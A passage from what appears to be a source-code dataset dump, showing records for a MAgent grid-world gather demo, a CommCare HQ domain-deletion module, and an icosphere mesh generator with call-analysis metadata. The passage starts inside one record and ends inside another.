'"""xji,yij->xy"""', (58, 41, 58, 46): 'dm10b', (58, 48, 58, 53): 'hso1e'}, {}), "('xji,yij->xy', dm10b, hso1e)", False, 'import numpy, sys\n'), ((79, 11, 79, 37), 'numpy.zeros', 'numpy.zeros', ({(79, 23, 79, 36): '(2, 3, nao, nao)'}, {}), '((2, 3, nao, nao))', False, 'import numpy, sys\n'), ((123, 14, 123, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(123, 32, 123, 35): 'mol', (123, 37, 123, 43): 'ao1[1]', (123, 45, 123, 51): 'ao2[2]', (123, 53, 123, 57): 'mask', (123, 59, 123, 69): 'shls_slice', (123, 71, 123, 77): 'ao_loc'}, {}), '(mol, ao1[1], ao2[2], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((124, 14, 124, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(124, 32, 124, 35): 'mol', (124, 37, 124, 43): 'ao1[2]', (124, 45, 124, 51): 'ao2[1]', (124, 53, 124, 57): 'mask', (124, 59, 124, 69): 'shls_slice', (124, 71, 124, 77): 'ao_loc'}, {}), '(mol, ao1[2], ao2[1], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((125, 14, 125, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(125, 32, 125, 35): 'mol', (125, 37, 125, 43): 'ao1[2]', (125, 45, 125, 51): 'ao2[0]', (125, 53, 125, 57): 'mask', (125, 59, 125, 69): 'shls_slice', (125, 71, 125, 77): 'ao_loc'}, {}), '(mol, ao1[2], ao2[0], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((126, 14, 126, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(126, 32, 126, 35): 'mol', (126, 37, 126, 43): 'ao1[0]', (126, 45, 126, 51): 'ao2[2]', (126, 53, 126, 57): 'mask', (126, 59, 126, 69): 'shls_slice', (126, 71, 126, 77): 'ao_loc'}, {}), '(mol, ao1[0], ao2[2], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((127, 14, 127, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(127, 32, 127, 35): 'mol', (127, 37, 127, 43): 'ao1[0]', (127, 45, 127, 51): 'ao2[1]', (127, 53, 127, 57): 'mask', (127, 59, 127, 69): 'shls_slice', (127, 71, 127, 77): 'ao_loc'}, {}), '(mol, ao1[0], ao2[1], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((128, 14, 128, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(128, 32, 128, 35): 'mol', (128, 37, 128, 43): 'ao1[1]', (128, 45, 128, 51): 'ao2[0]', (128, 53, 128, 57): 'mask', (128, 59, 128, 69): 'shls_slice', (128, 71, 128, 77): 'ao_loc'}, {}), '(mol, ao1[1], ao2[0], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((153, 10, 154, 61), 'pyscf.gto.M', 'gto.M', (), '', False, 'from pyscf import gto, scf\n'), ((162, 10, 168, 60), 'pyscf.gto.M', 'gto.M', (), '', False, 'from pyscf import gto, scf\n'), ((177, 4, 177, 24), 'numpy.random.seed', 'numpy.random.seed', ({(177, 22, 177, 23): '(1)'}, {}), '(1)', False, 'import numpy, sys\n'), ((181, 4, 181, 24), 'numpy.random.seed', 'numpy.random.seed', ({(181, 22, 181, 23): '(1)'}, {}), '(1)', False, 'import numpy, sys\n'), ((182, 10, 182, 42), 'numpy.random.random', 'numpy.random.random', ({(182, 30, 182, 41): '(2, nao, nao)'}, {}), '((2, nao, nao))', False, 'import numpy, sys\n'), ((184, 11, 184, 45), 'numpy.random.random', 'numpy.random.random', ({(184, 31, 184, 44): '(2, 3, nao, nao)'}, {}), '((2, 3, nao, nao))', False, 'import numpy, sys\n'), ((51, 13, 51, 57), 'functools.reduce', 'reduce', ({(51, 20, 51, 29): 'numpy.dot', (51, 31, 51, 56): '(mo_coeff[0], x, orboa.T)'}, {}), '(numpy.dot, (mo_coeff[0], x, orboa.T))', False, 'from functools import reduce\n'), ((52, 13, 52, 57), 'functools.reduce', 'reduce', ({(52, 20, 52, 29): 'numpy.dot', (52, 31, 52, 56): '(mo_coeff[1], x, orbob.T)'}, {}), '(numpy.dot, (mo_coeff[1], x, orbob.T))', False, 'from functools import reduce\n'), ((57, 13, 57, 54), 'numpy.einsum', 'numpy.einsum', ({(57, 26, 57, 39): '"""xji,yij->xy"""', (57, 41, 57, 46): 'dm10a', (57, 48, 57, 53): 'hso1e'}, {}), "('xji,yij->xy', dm10a, hso1e)", False, 'import numpy, sys\n'), ((81, 14, 81, 42), 'numpy.empty', 'numpy.empty', ({(81, 26, 81, 41): '(4, blksize, nao)'}, {}), '((4, blksize, nao))', False, 'import numpy, sys\n'), ((135, 8, 135, 46), 'pyscf.prop.esr.uhf.ESR.__init__', 'uhf_esr.ESR.__init__', ({(135, 29, 135, 33): 'self', (135, 35, 135, 45): 'scf_method'}, {}), '(self, scf_method)', True, 'from pyscf.prop.esr import uhf as uhf_esr\n'), ((178, 11, 178, 48), 'numpy.random.random', 'numpy.random.random', ({(178, 31, 178, 47): '(3, nmo, nelec[0])'}, {}), '((3, nmo, nelec[0]))', False, 'import numpy, sys\n'), ((179, 11, 179, 48), 'numpy.random.random', 'numpy.random.random', ({(179, 31, 179, 47): '(3, nmo, nelec[1])'}, {}), '((3, nmo, nelec[1]))', False, 'import numpy, sys\n'), ((90, 18, 90, 70), 'numpy.einsum', 'numpy.einsum', ({(90, 31, 90, 43): '"""xpi,p->xpi"""', (90, 45, 90, 51): 'ao[1:]', (90, 53, 90, 69): 'weight * vrho[:, (0)]'}, {}), "('xpi,p->xpi', ao[1:], weight * vrho[:, (0)])", False, 'import numpy, sys\n'), ((92, 18, 92, 70), 'numpy.einsum', 'numpy.einsum', ({(92, 31, 92, 43): '"""xpi,p->xpi"""', (92, 45, 92, 51): 'ao[1:]', (92, 53, 92, 69): 'weight * vrho[:, (1)]'}, {}), "('xpi,p->xpi', ao[1:], weight * vrho[:, (1)])", False, 'import numpy, sys\n'), ((97, 14, 97, 43), 'numpy.empty', 'numpy.empty', ({(97, 26, 97, 42): '(10, blksize, nao)'}, {}), '((10, blksize, nao))', False, 'import numpy, sys\n'), ((105, 23, 105, 71), 'pyscf.dft.numint._uks_gga_wv0', 'numint._uks_gga_wv0', ({(105, 43, 105, 57): '(rho_a, rho_b)', (105, 59, 105, 62): 'vxc', (105, 64, 105, 70): 'weight'}, {}), '((rho_a, rho_b), vxc, weight)', False, 'from pyscf.dft import numint\n'), ((109, 18, 109, 50), 'pyscf.grad.rks._make_dR_dao_w', 'rks_grad._make_dR_dao_w', ({(109, 42, 109, 44): 'ao', (109, 46, 109, 49): 'wva'}, {}), '(ao, wva)', True, 'from pyscf.grad import rks as rks_grad\n'), ((111, 18, 111, 50), 'pyscf.grad.rks._make_dR_dao_w', 'rks_grad._make_dR_dao_w', ({(111, 42, 111, 44): 'ao', (111, 46, 111, 49): 'wvb'}, {}), '(ao, wvb)', True, 'from pyscf.grad import rks as rks_grad\n'), ((155, 9, 155, 21), 'pyscf.scf.UKS', 'scf.UKS', ({(155, 17, 155, 20): 'mol'}, {}), '(mol)', False, 'from pyscf import gto, scf\n'), ((169, 9, 169, 21), 'pyscf.scf.UKS', 'scf.UKS', ({(169, 17, 169, 20): 'mol'}, {}), '(mol)', False, 'from pyscf import gto, scf\n')] |
mununum/MAgent | examples/gather_demo.py | 7272cd726182280444597310d52369fac5e13e37 | import random
import magent
from magent.builtin.rule_model import RandomActor
import numpy as np
def init_food(env, food_handle):
tree = np.asarray([[-1,0], [0,0], [0,-1], [0,1], [1,0]])
third = map_size//4 # mapsize includes walls
for i in range(1, 4):
for j in range(1, 4):
base = np.asarray([third*i, third*j])
env.add_agents(food_handle, method="custom", pos=tree+base)
def neigbor_regen_food(env, food_handle, p=0.003):
coords = env.get_pos(food_handle)
rands = np.random.random(len(coords))
for i, pos in enumerate(coords):
if rands[i] > p:
continue
neighbor = np.asarray([[-1,0],[0,-1], [0,1], [1,0]])
regen_pos = [pos+neighbor[np.random.randint(0,4)]]
env.add_agents(food_handle, method="custom",
pos=regen_pos)
if __name__ == "__main__":
gw = magent.gridworld
cfg = gw.Config()
map_size = 25
cfg.set({"map_width": map_size, "map_height": map_size})
agent_group = cfg.add_group(
cfg.register_agent_type(
name="agent",
attr={
'width': 1,
'length': 1,
'view_range': gw.CircleRange(4),
'can_gather': True}))
food_group = cfg.add_group(
cfg.register_agent_type(
"food",
attr={'width': 1,
'length': 1,
'can_be_gathered': True}))
# add reward rule
a = gw.AgentSymbol(agent_group, index='any')
b = gw.AgentSymbol(food_group, index='any')
e = gw.Event(a, 'collide', b)
cfg.add_reward_rule(e, receiver=a, value=1)
# cfg.add_reward_rule(e2, receiver=b, value=1, die=True)
# cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1])
env = magent.GridWorld(cfg)
agent_handle, food_handle = env.get_handles()
model1 = RandomActor(env, agent_handle, "up")
env.set_render_dir("build/render")
env.reset()
upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2),
(map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2),
(map_size//2 + 2, map_size//2 + 2)]
# spawnrate = 0.1
env.add_agents(agent_handle, method="custom", pos=upstart)
# env.add_agents(rightgroup, method="custom", pos=rightstart)
init_food(env, food_handle)
k = env.get_observation(agent_handle)
print env.get_pos(agent_handle)
print len(env.get_pos(food_handle))
done = False
step_ct = 0
r_sum = 0
while not done:
obs_1 = env.get_observation(agent_handle)
ids_1 = env.get_agent_id(agent_handle)
acts_1 = model1.infer_action(obs_1, ids_1)
env.set_action(agent_handle, acts_1)
# simulate one step
done = env.step()
# render
env.render()
# get reward
reward = sum(env.get_reward(agent_handle))
r_sum += reward
# clear dead agents
env.clear_dead()
neigbor_regen_food(env, food_handle)
# print info
# if step_ct % 10 == 0:
# print("step %d" % step_ct)
step_ct += 1
if step_ct > 250:
break
print r_sum | [] |
shyamkumarlchauhan/commcare-hq | corehq/apps/domain/deletion.py | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | import itertools
import logging
from datetime import date
from django.apps import apps
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Q
from dimagi.utils.chunked import chunked
from corehq.apps.accounting.models import Subscription
from corehq.apps.accounting.utils import get_change_status
from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type
from corehq.apps.domain.utils import silence_during_tests
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.userreports.dbaccessors import (
delete_all_ucr_tables_for_domain,
)
from corehq.apps.users.views.mobile import UserFieldsView
from corehq.blobs import CODES, get_blob_db
from corehq.blobs.models import BlobMeta
from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state
from corehq.form_processor.interfaces.dbaccessors import (
CaseAccessors,
FormAccessors,
)
from corehq.util.log import with_progress_bar
logger = logging.getLogger(__name__)
class BaseDeletion(object):
def __init__(self, app_label):
self.app_label = app_label
def is_app_installed(self):
try:
return bool(apps.get_app_config(self.app_label))
except LookupError:
return False
class CustomDeletion(BaseDeletion):
def __init__(self, app_label, deletion_fn):
super(CustomDeletion, self).__init__(app_label)
self.deletion_fn = deletion_fn
def execute(self, domain_name):
if self.is_app_installed():
self.deletion_fn(domain_name)
class RawDeletion(BaseDeletion):
def __init__(self, app_label, raw_query):
super(RawDeletion, self).__init__(app_label)
self.raw_query = raw_query
def execute(self, cursor, domain_name):
if self.is_app_installed():
cursor.execute(self.raw_query, [domain_name])
class ModelDeletion(BaseDeletion):
def __init__(self, app_label, model_name, domain_filter_kwarg):
super(ModelDeletion, self).__init__(app_label)
self.domain_filter_kwarg = domain_filter_kwarg
self.model_name = model_name
def get_model_class(self):
return apps.get_model(self.app_label, self.model_name)
def execute(self, domain_name):
if not domain_name:
# The Django orm will properly turn a None domain_name to a
# IS NULL filter. We don't want to allow deleting records for
# NULL domain names since they might have special meaning (like
# in some of the SMS models).
raise RuntimeError("Expected a valid domain name")
if self.is_app_installed():
model = self.get_model_class()
model.objects.filter(**{self.domain_filter_kwarg: domain_name}).delete()
def _delete_domain_backend_mappings(domain_name):
model = apps.get_model('sms', 'SQLMobileBackendMapping')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_domain_backends(domain_name):
model = apps.get_model('sms', 'SQLMobileBackend')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_web_user_membership(domain_name):
from corehq.apps.users.models import WebUser
active_web_users = WebUser.by_domain(domain_name)
inactive_web_users = WebUser.by_domain(domain_name, is_active=False)
for web_user in list(active_web_users) + list(inactive_web_users):
web_user.delete_domain_membership(domain_name)
if settings.UNIT_TESTING and not web_user.domain_memberships:
web_user.delete()
else:
web_user.save()
def _terminate_subscriptions(domain_name):
today = date.today()
with transaction.atomic():
current_subscription = Subscription.get_active_subscription_by_domain(domain_name)
if current_subscription:
current_subscription.date_end = today
current_subscription.is_active = False
current_subscription.save()
current_subscription.transfer_credits()
_, downgraded_privs, upgraded_privs = get_change_status(current_subscription.plan_version, None)
current_subscription.subscriber.deactivate_subscription(
downgraded_privileges=downgraded_privs,
upgraded_privileges=upgraded_privs,
old_subscription=current_subscription,
new_subscription=None,
)
Subscription.visible_objects.filter(
Q(date_start__gt=today) | Q(date_start=today, is_active=False),
subscriber__domain=domain_name,
).update(is_hidden_to_ops=True)
def _delete_all_cases(domain_name):
logger.info('Deleting cases...')
case_accessor = CaseAccessors(domain_name)
case_ids = case_accessor.get_case_ids_in_domain()
for case_id_chunk in chunked(with_progress_bar(case_ids, stream=silence_during_tests()), 500):
case_accessor.soft_delete_cases(list(case_id_chunk))
logger.info('Deleting cases complete.')
def _delete_all_forms(domain_name):
logger.info('Deleting forms...')
form_accessor = FormAccessors(domain_name)
form_ids = list(itertools.chain(*[
form_accessor.get_all_form_ids_in_domain(doc_type=doc_type)
for doc_type in doc_type_to_state
]))
for form_id_chunk in chunked(with_progress_bar(form_ids, stream=silence_during_tests()), 500):
form_accessor.soft_delete_forms(list(form_id_chunk))
logger.info('Deleting forms complete.')
def _delete_data_files(domain_name):
get_blob_db().bulk_delete(metas=list(BlobMeta.objects.partitioned_query(domain_name).filter(
parent_id=domain_name,
type_code=CODES.data_file,
)))
def _delete_custom_data_fields(domain_name):
# The CustomDataFieldsDefinition instances are cleaned up as part of the
# bulk couch delete, but we also need to clear the cache
logger.info('Deleting custom data fields...')
for field_view in [LocationFieldsView, ProductFieldsView, UserFieldsView]:
get_by_domain_and_type.clear(domain_name, field_view.field_type)
logger.info('Deleting custom data fields complete.')
# We use raw queries instead of ORM because Django queryset delete needs to
# fetch objects into memory to send signals and handle cascades. It makes deletion very slow
# if we have a millions of rows in stock data tables.
DOMAIN_DELETE_OPERATIONS = [
RawDeletion('stock', """
DELETE FROM stock_stocktransaction
WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s)
"""),
RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"),
RawDeletion('stock', """
DELETE FROM commtrack_stockstate
WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s)
"""),
ModelDeletion('products', 'SQLProduct', 'domain'),
ModelDeletion('locations', 'SQLLocation', 'domain'),
ModelDeletion('locations', 'LocationType', 'domain'),
ModelDeletion('stock', 'DocDomainMapping', 'domain_name'),
ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'),
ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'),
ModelDeletion('sms', 'SMS', 'domain'),
ModelDeletion('sms', 'SQLLastReadMessage', 'domain'),
ModelDeletion('sms', 'ExpectedCallback', 'domain'),
ModelDeletion('ivr', 'Call', 'domain'),
ModelDeletion('sms', 'Keyword', 'domain'),
ModelDeletion('sms', 'PhoneNumber', 'domain'),
ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'),
ModelDeletion('sms', 'MessagingEvent', 'domain'),
ModelDeletion('sms', 'QueuedSMS', 'domain'),
ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backend_mappings),
ModelDeletion('sms', 'MobileBackendInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backends),
CustomDeletion('users', _delete_web_user_membership),
CustomDeletion('accounting', _terminate_subscriptions),
CustomDeletion('form_processor', _delete_all_cases),
CustomDeletion('form_processor', _delete_all_forms),
ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'),
ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'),
ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'),
ModelDeletion('app_manager', 'ResourceOverride', 'domain'),
ModelDeletion('app_manager', 'GlobalAppConfig', 'domain'),
ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'),
ModelDeletion('case_search', 'CaseSearchConfig', 'domain'),
ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'),
ModelDeletion('case_search', 'FuzzyProperties', 'domain'),
ModelDeletion('case_search', 'IgnorePatterns', 'domain'),
ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'),
ModelDeletion('consumption', 'DefaultConsumption', 'domain'),
ModelDeletion('data_analytics', 'GIRRow', 'domain_name'),
ModelDeletion('data_analytics', 'MALTRow', 'domain_name'),
ModelDeletion('data_dictionary', 'CaseType', 'domain'),
ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO
ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'),
ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'),
ModelDeletion('domain', 'TransferDomainRequest', 'domain'),
ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'),
CustomDeletion('export', _delete_data_files),
ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'),
ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'),
ModelDeletion('ota', 'SerialIdBucket', 'domain'),
ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'),
ModelDeletion('phone', 'SyncLogSQL', 'domain'),
ModelDeletion('registration', 'RegistrationRequest', 'domain'),
ModelDeletion('reminders', 'EmailUsage', 'domain'),
ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'),
ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'),
ModelDeletion('translations', 'SMSTranslations', 'domain'),
ModelDeletion('translations', 'TransifexBlacklist', 'domain'),
ModelDeletion('userreports', 'AsyncIndicator', 'domain'),
ModelDeletion('users', 'DomainRequest', 'domain'),
ModelDeletion('users', 'Invitation', 'domain'),
ModelDeletion('users', 'DomainPermissionsMirror', 'source'),
ModelDeletion('zapier', 'ZapierSubscription', 'domain'),
ModelDeletion('dhis2', 'Dhis2Connection', 'domain'),
ModelDeletion('motech', 'RequestLog', 'domain'),
ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'),
CustomDeletion('custom_data_fields', _delete_custom_data_fields),
CustomDeletion('ucr', delete_all_ucr_tables_for_domain),
]
def apply_deletion_operations(domain_name):
raw_ops, model_ops = _split_ops_by_type(DOMAIN_DELETE_OPERATIONS)
with connection.cursor() as cursor:
for op in raw_ops:
op.execute(cursor, domain_name)
for op in model_ops:
op.execute(domain_name)
def _split_ops_by_type(ops):
raw_ops = []
model_ops = []
for op in ops:
if isinstance(op, RawDeletion):
raw_ops.append(op)
else:
model_ops.append(op)
return raw_ops, model_ops
| [((31, 9, 31, 36), 'logging.getLogger', 'logging.getLogger', ({(31, 27, 31, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((91, 12, 91, 60), 'django.apps.apps.get_model', 'apps.get_model', ({(91, 27, 91, 32): '"""sms"""', (91, 34, 91, 59): '"""SQLMobileBackendMapping"""'}, {}), "('sms', 'SQLMobileBackendMapping')", False, 'from django.apps import apps\n'), ((96, 12, 96, 53), 'django.apps.apps.get_model', 'apps.get_model', ({(96, 27, 96, 32): '"""sms"""', (96, 34, 96, 52): '"""SQLMobileBackend"""'}, {}), "('sms', 'SQLMobileBackend')", False, 'from django.apps import apps\n'), ((102, 23, 102, 53), 'corehq.apps.users.models.WebUser.by_domain', 'WebUser.by_domain', ({(102, 41, 102, 52): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.apps.users.models import WebUser\n'), ((103, 25, 103, 72), 'corehq.apps.users.models.WebUser.by_domain', 'WebUser.by_domain', (), '', False, 'from corehq.apps.users.models import WebUser\n'), ((113, 12, 113, 24), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date\n'), ((141, 20, 141, 46), 'corehq.form_processor.interfaces.dbaccessors.CaseAccessors', 'CaseAccessors', ({(141, 34, 141, 45): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.form_processor.interfaces.dbaccessors import CaseAccessors, FormAccessors\n'), ((150, 20, 150, 46), 'corehq.form_processor.interfaces.dbaccessors.FormAccessors', 'FormAccessors', ({(150, 34, 150, 45): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.form_processor.interfaces.dbaccessors import CaseAccessors, FormAccessors\n'), ((76, 15, 76, 62), 'django.apps.apps.get_model', 'apps.get_model', ({(76, 30, 76, 44): 'self.app_label', (76, 46, 76, 61): 'self.model_name'}, {}), '(self.app_label, self.model_name)', False, 'from django.apps import apps\n'), ((115, 9, 115, 29), 'django.db.transaction.atomic', 'transaction.atomic', ({}, {}), '()', False, 'from django.db import connection, transaction\n'), ((116, 31, 116, 90), 'corehq.apps.accounting.models.Subscription.get_active_subscription_by_domain', 'Subscription.get_active_subscription_by_domain', ({(116, 78, 116, 89): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.apps.accounting.models import Subscription\n'), ((172, 8, 172, 72), 'corehq.apps.custom_data_fields.dbaccessors.get_by_domain_and_type.clear', 'get_by_domain_and_type.clear', ({(172, 37, 172, 48): 'domain_name', (172, 50, 172, 71): 'field_view.field_type'}, {}), '(domain_name, field_view.field_type)', False, 'from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type\n'), ((263, 9, 263, 28), 'django.db.connection.cursor', 'connection.cursor', ({}, {}), '()', False, 'from django.db import connection, transaction\n'), ((125, 50, 125, 108), 'corehq.apps.accounting.utils.get_change_status', 'get_change_status', ({(125, 68, 125, 101): 'current_subscription.plan_version', (125, 103, 125, 107): 'None'}, {}), '(current_subscription.plan_version, None)', False, 'from corehq.apps.accounting.utils import get_change_status\n'), ((161, 4, 161, 17), 'corehq.blobs.get_blob_db', 'get_blob_db', ({}, {}), '()', False, 'from corehq.blobs import CODES, get_blob_db\n'), ((41, 24, 41, 59), 'django.apps.apps.get_app_config', 'apps.get_app_config', ({(41, 44, 41, 58): 'self.app_label'}, {}), '(self.app_label)', False, 'from django.apps import apps\n'), ((143, 68, 143, 90), 'corehq.apps.domain.utils.silence_during_tests', 'silence_during_tests', ({}, {}), '()', False, 'from corehq.apps.domain.utils import silence_during_tests\n'), ((155, 68, 155, 90), 'corehq.apps.domain.utils.silence_during_tests', 'silence_during_tests', ({}, {}), '()', False, 'from corehq.apps.domain.utils import silence_during_tests\n'), ((134, 12, 134, 35), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((134, 38, 134, 74), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((161, 41, 161, 88), 'corehq.blobs.models.BlobMeta.objects.partitioned_query', 'BlobMeta.objects.partitioned_query', ({(161, 76, 161, 87): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.blobs.models import BlobMeta\n')] |
JackWalpole/icosahedron | icosphere/icosphere.py | 5317d8eb9509abe275beb2693730e3efaa986672 | """Subdivided icosahedral mesh generation"""
from __future__ import print_function
import numpy as np
# following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html
# hierarchy:
# Icosphere -> Triangle -> Point
class IcoSphere:
"""
Usage: IcoSphere(level)
Maximum supported level = 8
get started with:
>>> A = IcoSphere(3)
... A.plot3d()
"""
# maximum level for subdivision of the icosahedron
maxlevel = 8
def __init__(self, level):
if type(level) is not int:
raise TypeError('level must be an integer')
elif level < 0:
raise Exception('level must be no less than 0')
elif level > self.maxlevel:
raise Exception('level larger than ' + str(self.maxlevel) + ' not supported')
self.level = level
self.points = []
self.triangles = []
self.npts = 0
################################
# initialise level 1 icosahedron
################################
# golden ration
t = (1.0 + np.sqrt(5.0)) / 2.0
# add vertices
self._addPoint(np.array([-1, t, 0]))
self._addPoint(np.array([ 1, t, 0]))
self._addPoint(np.array([-1,-t, 0]))
self._addPoint(np.array([ 1,-t, 0]))
self._addPoint(np.array([ 0,-1, t]))
self._addPoint(np.array([ 0, 1, t]))
self._addPoint(np.array([ 0,-1,-t]))
self._addPoint(np.array([ 0, 1,-t]))
self._addPoint(np.array([ t, 0,-1]))
self._addPoint(np.array([ t, 0, 1]))
self._addPoint(np.array([-t, 0,-1]))
self._addPoint(np.array([-t, 0, 1]))
# make triangles
tris = self.triangles
verts = self.points
# 5 faces around point 0
tris.append(Triangle([ verts[0],verts[11], verts[5]]))
tris.append(Triangle([ verts[0], verts[5], verts[1]]))
tris.append(Triangle([ verts[0], verts[1], verts[7]]))
tris.append(Triangle([ verts[0], verts[7],verts[10]]))
tris.append(Triangle([ verts[0],verts[10],verts[11]]))
# 5 adjacent faces
tris.append(Triangle([ verts[1], verts[5], verts[9]]))
tris.append(Triangle([ verts[5],verts[11], verts[4]]))
tris.append(Triangle([verts[11],verts[10], verts[2]]))
tris.append(Triangle([verts[10], verts[7], verts[6]]))
tris.append(Triangle([ verts[7], verts[1], verts[8]]))
# 5 faces around point 3
tris.append(Triangle([ verts[3], verts[9], verts[4]]))
tris.append(Triangle([ verts[3], verts[4], verts[2]]))
tris.append(Triangle([ verts[3], verts[2], verts[6]]))
tris.append(Triangle([ verts[3], verts[6], verts[8]]))
tris.append(Triangle([ verts[3], verts[8], verts[9]]))
# 5 adjacent faces
tris.append(Triangle([ verts[4], verts[9], verts[5]]))
tris.append(Triangle([ verts[2], verts[4],verts[11]]))
tris.append(Triangle([ verts[6], verts[2],verts[10]]))
tris.append(Triangle([ verts[8], verts[6], verts[7]]))
tris.append(Triangle([ verts[9], verts[8], verts[1]]))
########################################
# refine triangles to desired mesh level
########################################
for l in range(self.level):
midPointDict = {}
faces = []
for tri in self.triangles:
# replace triangle by 4 triangles
p = tri.pts
a = self._getMiddlePoint(p[0], p[1], midPointDict)
b = self._getMiddlePoint(p[1], p[2], midPointDict)
c = self._getMiddlePoint(p[2], p[0], midPointDict)
faces.append(Triangle([p[0], a, c]))
faces.append(Triangle([p[1], b, a]))
faces.append(Triangle([p[2], c, b]))
faces.append(Triangle([a, b, c]))
# once looped thru all triangles overwrite self.triangles
self.triangles = faces
self.nfaces = len(self.triangles)
# check that npts and nfaces are as expected
expected_npts = calculate_npts(self.level)
expected_nfaces = calculate_nfaces(self.level)
if self.npts != calculate_npts(self.level):
raise Exception('npts '+str(self.npts)+' not as expected '+str(expected_npts))
elif self.nfaces != calculate_nfaces(self.level):
raise Exception('nfaces '+str(self.nfaces)+' not as expected '+str(expected_nfaces))
def _addPoint(self, xyz):
"""Add point to self.points"""
self.points.append(Point(self.npts, xyz))
self.npts += 1
def _getMiddlePoint(self, p1, p2, midPointDict):
"""return Point"""
if not isinstance(p1, Point) or not isinstance(p2, Point):
raise TypeError('p1 and p2 must be Points')
# does point already exist?
key = tuple(sorted([p1.idx, p2.idx]))
if key in midPointDict:
# point exists
pass
else:
# point is new
self._addPoint((p1.xyz + p2.xyz)/2)
midPointDict[key] = self.points[-1]
return midPointDict[key]
def plot3d(self):
"""Matplotlib 3D plot of mesh"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xyz = np.asarray([ pt.xyz for pt in self.points ])
x = xyz[:,0]
y = xyz[:,1]
z = xyz[:,2]
ts = np.asarray([ [ p.idx for p in t.pts ] for t in self.triangles ])
ax.plot_trisurf(x,y,ts,z)
plt.show()
def dump_xyz(self):
[ print(*pt.xyz) for pt in self.points ]
def dump_latlonr(self):
[ print(*cart2geo(*pt.xyz)) for pt in self.points ]
class Triangle:
"""A triangle adjoining three adjacent points"""
def __init__(self, pts):
if not isinstance(pts, list):
raise TypeError('pts must be a list')
elif len(pts) !=3:
raise Exception('pts must be of length 3')
else:
self.pts = pts
class Point:
"""A 3D point on the mesh"""
def __init__(self, idx, xyz):
if type(idx) is not int:
raise TypeError('idx must be an integer')
elif not isinstance(xyz,np.ndarray):
raise TypeError('xyz must be a numpy array')
elif xyz.size != 3:
raise Exception('xyz must be of size 3')
else:
# ensure length equals 1 and add to list of points
self.xyz = (xyz/np.linalg.norm(xyz))
self.idx = idx
def calculate_npts(level):
n = 2**level
return 2 + 10 * n**2
def calculate_nfaces(level):
n = 2**level
return 20 * n**2
def cart2geo(x, y, z):
"""convert x y z cartesian coordinates to latitude longitude radius
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
r = np.sqrt(x**2 + y**2 + z**2)
lon = np.rad2deg(np.arctan2(y,x))
lat = np.rad2deg(np.arcsin(z/r))
return lat, lon, r
def geo2cart(lat, lon, r):
